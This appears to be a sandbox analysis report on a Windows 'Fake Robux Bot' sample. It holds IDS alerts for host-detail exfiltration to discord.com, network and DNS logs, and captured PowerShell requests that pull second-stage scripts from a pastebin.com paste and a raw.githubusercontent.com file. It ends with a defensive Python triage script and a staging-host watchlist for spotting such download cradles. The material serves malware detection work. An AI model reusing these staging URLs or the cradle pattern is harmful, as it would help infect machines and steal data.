KERNEL32.dll | VirtualFree, VirtualAlloc, WaitForSingleObject, MultiByteToWideChar, Sleep, GetLastError, CloseHandle, CreateProcessW, CreateFileW, HeapSize, GetProcessHeap, SetStdHandle, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetStringTypeW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, RaiseException, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapFree, GetFileType, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, WriteConsoleW
USER32.dll | MessageBoxW
WININET.dll | InternetOpenUrlW, InternetOpenW, InternetCloseHandle, InternetReadFile
Language of compilation system: English
Country where language is spoken: United States
Suricata IDS alerts

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-15T15:54:51.325571+0200 | 2857658 | ETPRO MALWARE Win32/Fake Robux Bot Registration | 1 | 192.168.2.3 | 62862 | 162.159.138.232 | 443 | TCP
2024-10-15T15:55:12.953506+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.3 | 62871 | 162.159.138.232 | 443 | TCP
2024-10-15T15:55:18.941754+0200 | 2857659 | ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil | 1 | 192.168.2.3 | 62872 | 162.159.138.232 | 443 | TCP
Network traffic (TCP packets)

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                Oct 15, 2024 15:54:51.325704098 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:51.337537050 CEST62862443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:54:54.738395929 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:54.743406057 CEST8062863104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:54.743626118 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:54.745069981 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:54.750014067 CEST8062863104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.356730938 CEST8062863104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.359507084 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.359535933 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.359630108 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.366707087 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.366723061 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.473124027 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.983211040 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.983891964 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.985531092 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:55.985553980 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.985835075 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:55.992289066 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:56.039407969 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.141788960 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.141894102 CEST44362864104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.141994953 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:56.194992065 CEST62864443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:54:56.250463009 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.255404949 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.255789042 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.256139994 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.261173964 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.860342026 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.860641003 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.861955881 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.862060070 CEST6286580192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.864386082 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.864451885 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.865583897 CEST8062865185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:56.865679979 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.865959883 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:56.865986109 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.844743013 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.844849110 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.870608091 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.870625019 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.871026039 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.871926069 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.915401936 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995038986 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995140076 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995170116 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995194912 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.995209932 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995277882 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.995286942 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995656967 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:57.995723963 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:57.995731115 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:58.003468037 CEST44362866185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:54:58.003550053 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:54:58.045392990 CEST62866443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:01.585823059 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:01.590903044 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:01.594052076 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:01.595312119 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:01.600431919 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.453439951 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.453788996 CEST8062867104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.453869104 CEST6286780192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.569444895 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.569490910 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:02.569597960 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.583997011 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:02.584019899 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.209709883 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.209873915 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.211920023 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.211925030 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.212311983 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.228061914 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.271414042 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.372608900 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.372731924 CEST44362868104.20.3.235192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.374181032 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.429285049 CEST62868443192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:03.462133884 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:03.467190981 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:03.467953920 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:03.468152046 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:03.473033905 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.058543921 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.058821917 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.059164047 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.059225082 CEST6286980192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.059773922 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.059813023 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.059896946 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.060183048 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.060199976 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.063721895 CEST8062869185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.991636038 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.991812944 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.993451118 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:04.993467093 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.993839979 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:04.994815111 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.035403967 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345571995 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345628977 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345654964 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345675945 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345741987 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.345768929 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.345782042 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.346178055 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.346224070 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.346234083 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.351982117 CEST44362870185.199.110.133192.168.2.3
                                                                                                Oct 15, 2024 15:55:05.352060080 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:05.392771959 CEST62870443192.168.2.3185.199.110.133
                                                                                                Oct 15, 2024 15:55:11.939635992 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:11.939694881 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:11.939776897 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:11.946779966 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:11.946794987 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.557713985 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.557790995 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.563751936 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.563771009 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.564038992 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.564925909 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.607394934 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.607459068 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.607465982 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.953572989 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.953859091 CEST44362871162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:12.953939915 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:12.977652073 CEST62871443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.061791897 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.061836958 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.061944008 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.062438965 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.062460899 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.081305027 CEST6286380192.168.2.3104.20.3.235
                                                                                                Oct 15, 2024 15:55:18.682425022 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.682554960 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.683880091 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.683886051 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.684127092 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.685029030 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.727396011 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.727466106 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.727471113 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.941766977 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.941833973 CEST44362872162.159.138.232192.168.2.3
                                                                                                Oct 15, 2024 15:55:18.941904068 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:18.947873116 CEST62872443192.168.2.3162.159.138.232
                                                                                                Oct 15, 2024 15:55:24.060116053 CEST6286780192.168.2.3104.20.3.235
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 15, 2024 15:54:10.735569954 CEST | 62913 | 53 | 192.168.2.3 | 1.1.1.1
Oct 15, 2024 15:54:10.746560097 CEST | 53 | 62913 | 1.1.1.1 | 192.168.2.3
Oct 15, 2024 15:54:37.230989933 CEST | 53 | 60798 | 162.159.36.2 | 192.168.2.3
Oct 15, 2024 15:54:37.860766888 CEST | 50982 | 53 | 192.168.2.3 | 1.1.1.1
Oct 15, 2024 15:54:37.868402958 CEST | 53 | 50982 | 1.1.1.1 | 192.168.2.3
Oct 15, 2024 15:54:50.451730967 CEST | 59420 | 53 | 192.168.2.3 | 1.1.1.1
Oct 15, 2024 15:54:50.458738089 CEST | 53 | 59420 | 1.1.1.1 | 192.168.2.3
Oct 15, 2024 15:54:54.718632936 CEST | 49886 | 53 | 192.168.2.3 | 1.1.1.1
Oct 15, 2024 15:54:54.726151943 CEST | 53 | 49886 | 1.1.1.1 | 192.168.2.3
Oct 15, 2024 15:54:56.240118027 CEST | 62648 | 53 | 192.168.2.3 | 1.1.1.1
Oct 15, 2024 15:54:56.247569084 CEST | 53 | 62648 | 1.1.1.1 | 192.168.2.3
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 15, 2024 15:54:10.735569954 CEST | 192.168.2.3 | 1.1.1.1 | 0x7884 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:37.860766888 CEST | 192.168.2.3 | 1.1.1.1 | 0xf2f1 | Standard query (0) | 198.187.3.20.in-addr.arpa | PTR (Pointer record) | IN (0x0001) | false
Oct 15, 2024 15:54:50.451730967 CEST | 192.168.2.3 | 1.1.1.1 | 0xd6a8 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:54.718632936 CEST | 192.168.2.3 | 1.1.1.1 | 0x85c8 | Standard query (0) | pastebin.com | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:56.240118027 CEST | 192.168.2.3 | 1.1.1.1 | 0x49d7 | Standard query (0) | raw.githubusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 15, 2024 15:54:10.746560097 CEST | 1.1.1.1 | 192.168.2.3 | 0x7884 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:10.746560097 CEST | 1.1.1.1 | 192.168.2.3 | 0x7884 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:10.746560097 CEST | 1.1.1.1 | 192.168.2.3 | 0x7884 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:10.746560097 CEST | 1.1.1.1 | 192.168.2.3 | 0x7884 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:37.868402958 CEST | 1.1.1.1 | 192.168.2.3 | 0xf2f1 | Name error (3) | 198.187.3.20.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001) | false
Oct 15, 2024 15:54:50.458738089 CEST | 1.1.1.1 | 192.168.2.3 | 0xd6a8 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:50.458738089 CEST | 1.1.1.1 | 192.168.2.3 | 0xd6a8 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:50.458738089 CEST | 1.1.1.1 | 192.168.2.3 | 0xd6a8 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:50.458738089 CEST | 1.1.1.1 | 192.168.2.3 | 0xd6a8 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:50.458738089 CEST | 1.1.1.1 | 192.168.2.3 | 0xd6a8 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:54.726151943 CEST | 1.1.1.1 | 192.168.2.3 | 0x85c8 | No error (0) | pastebin.com | | 104.20.3.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:54.726151943 CEST | 1.1.1.1 | 192.168.2.3 | 0x85c8 | No error (0) | pastebin.com | | 172.67.19.24 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:54.726151943 CEST | 1.1.1.1 | 192.168.2.3 | 0x85c8 | No error (0) | pastebin.com | | 104.20.4.235 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:56.247569084 CEST | 1.1.1.1 | 192.168.2.3 | 0x49d7 | No error (0) | raw.githubusercontent.com | | 185.199.110.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:56.247569084 CEST | 1.1.1.1 | 192.168.2.3 | 0x49d7 | No error (0) | raw.githubusercontent.com | | 185.199.108.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:56.247569084 CEST | 1.1.1.1 | 192.168.2.3 | 0x49d7 | No error (0) | raw.githubusercontent.com | | 185.199.109.133 | A (IP address) | IN (0x0001) | false
Oct 15, 2024 15:54:56.247569084 CEST | 1.1.1.1 | 192.168.2.3 | 0x49d7 | No error (0) | raw.githubusercontent.com | | 185.199.111.133 | A (IP address) | IN (0x0001) | false
                                                                                                • raw.githubusercontent.com
                                                                                                • discord.com
                                                                                                • pastebin.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.3 | 62863 | 104.20.3.235 | 80 | 4116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:54.745069981 CEST | 169 | OUT | GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
Host: pastebin.com
Connection: Keep-Alive
Oct 15, 2024 15:54:55.356730938 CEST | 472 | IN | HTTP/1.1 301 Moved Permanently
Date: Tue, 15 Oct 2024 13:54:55 GMT
Content-Type: text/html
Content-Length: 167
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Tue, 15 Oct 2024 14:54:55 GMT
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
CF-RAY: 8d304dc78ce4e952-DFW
                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.3 | 62865 | 185.199.110.133 | 80 | 4116 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
Oct 15, 2024 15:54:56.256139994 CEST | 222 | OUT | GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
Host: raw.githubusercontent.com
Connection: Keep-Alive
Oct 15, 2024 15:54:56.860342026 CEST | 541 | IN | HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 0
Server: Varnish
Retry-After: 0
Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Accept-Ranges: bytes
Date: Tue, 15 Oct 2024 13:54:56 GMT
Via: 1.1 varnish
X-Served-By: cache-dfw-kdal2120058-DFW
X-Cache: HIT
X-Cache-Hits: 0
X-Timer: S1729000497.794649,VS0,VE0
Access-Control-Allow-Origin: *
Cross-Origin-Resource-Policy: cross-origin
Expires: Tue, 15 Oct 2024 13:59:56 GMT
Vary: Authorization,Accept-Encoding
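
Sessions 0 and 1 above show the observable that matters for detection: Windows PowerShell's own web-cmdlet User-Agent (WindowsPowerShell/5.1.19041.3031) fetching a raw paste from pastebin.com and a raw file from raw.githubusercontent.com over plain port 80, and both servers answering with a 301 to the HTTPS URL, so the script body itself only travels over TLS. The following triage routine is an added example and not code from the Joe Sandbox report or from the sample: it parses a captured request and its response in the form shown above, scores the request, and records the HTTPS Location the cradle will follow next. The sample request and response are constructed from session 0; the benign browser request, the staging-host watchlist and the severity thresholds are assumptions for illustration.

```python
"""Triage sandbox/proxy HTTP sessions for PowerShell download cradles.

Added example; not code from the Joe Sandbox report. The requests and the
301 response below are constructed from the report's sessions 0 and 1.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Hosts routinely used to stage second-stage scripts. Assumed watchlist,
# seeded with the three hosts the report resolves.
STAGING_HOSTS = {"pastebin.com", "raw.githubusercontent.com", "discord.com"}

# User-Agent that Windows PowerShell 5.1's Invoke-WebRequest/Invoke-RestMethod
# send by default; the build number identifies the client's PowerShell version.
POWERSHELL_UA = re.compile(r"WindowsPowerShell/(\d+(?:\.\d+){3})")


@dataclass
class HttpRequest:
    dst_ip: str
    dst_port: int
    pid: int
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)

    @property
    def host(self) -> str:
        return self.headers.get("host", "").lower()


def parse_request(raw: str, dst_ip: str, dst_port: int, pid: int) -> HttpRequest:
    """Parse a raw HTTP/1.1 request (request line plus headers)."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break                      # blank line ends the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(dst_ip, dst_port, pid, method, path, headers)


def redirect_target(raw_response: str) -> Optional[str]:
    """Location header of a 3xx response, or None for anything else."""
    lines = raw_response.strip().splitlines()
    status = lines[0].split(" ")
    if len(status) < 2 or not status[1].startswith("3"):
        return None
    for line in lines[1:]:
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            return value.strip()
    return None


def assess(req: HttpRequest) -> Tuple[str, List[str]]:
    """Score one request: (severity, findings)."""
    findings: List[str] = []
    ua = POWERSHELL_UA.search(req.headers.get("user-agent", ""))
    if ua:
        findings.append(f"powershell_user_agent:{ua.group(1)}")
    if req.host in STAGING_HOSTS:
        findings.append(f"staging_host:{req.host}")
    if req.dst_port == 80:
        findings.append("cleartext_http")
    # PowerShell pulling a raw paste is the cradle itself; each signal alone
    # is common enough in administration traffic to be only informational.
    if ua and req.host in STAGING_HOSTS:
        return "high", findings
    return ("low" if findings else "none"), findings


# Constructed from the report's session 0 (PID 4116 -> 104.20.3.235:80).
PASTEBIN_REQUEST = """\
GET /raw/sA04Mwk2 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.3031
Host: pastebin.com
Connection: Keep-Alive
"""
PASTEBIN_RESPONSE = """\
HTTP/1.1 301 Moved Permanently
Content-Type: text/html
Location: https://pastebin.com/raw/sA04Mwk2
Server: cloudflare
"""
# Constructed benign request for contrast; not from the report.
BROWSER_REQUEST = """\
GET /index.html HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0
Host: example.com
"""


def triage(raw_request: str, raw_response: str, dst_ip: str, dst_port: int, pid: int) -> dict:
    """Combine request scoring with the redirect the client will follow next."""
    req = parse_request(raw_request, dst_ip, dst_port, pid)
    severity, findings = assess(req)
    scheme = "https" if req.dst_port == 443 else "http"
    return {"pid": pid, "url": f"{scheme}://{req.host}{req.path}", "severity": severity,
            "findings": findings, "next_url": redirect_target(raw_response)}


if __name__ == "__main__":
    print(triage(PASTEBIN_REQUEST, PASTEBIN_RESPONSE, "104.20.3.235", 80, 4116))
```

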